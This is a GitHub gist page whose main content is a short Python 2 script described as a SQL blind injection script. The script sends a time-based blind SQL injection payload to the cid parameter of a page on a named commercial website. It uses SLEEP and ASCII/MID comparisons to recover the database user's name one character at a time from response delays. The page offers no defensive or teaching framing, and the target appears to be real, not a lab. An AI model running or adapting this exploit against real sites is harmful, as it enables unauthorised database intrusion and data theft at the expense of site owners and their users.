Skip to content

Instantly share code, notes, and snippets.

@imfht imfht/sqlinj.py
Created Jan 21, 2019

Embed
What would you like to do?
SQL盲注脚本
#!/usr/bin/env python
# encoding: utf-8
# vip.py
# ringzero@0x557.org
import requests
import time
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
for i in range(1,20):
for _str in payloads:
start_time = time.time()
url = "http://www.vip.com/beauty.php?cid=9);(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(USER())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))ring)&stock=9&order=9&page=9"
result = requests.get(url).text
if(time.time() - start_time) > 3:
print _str
break
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.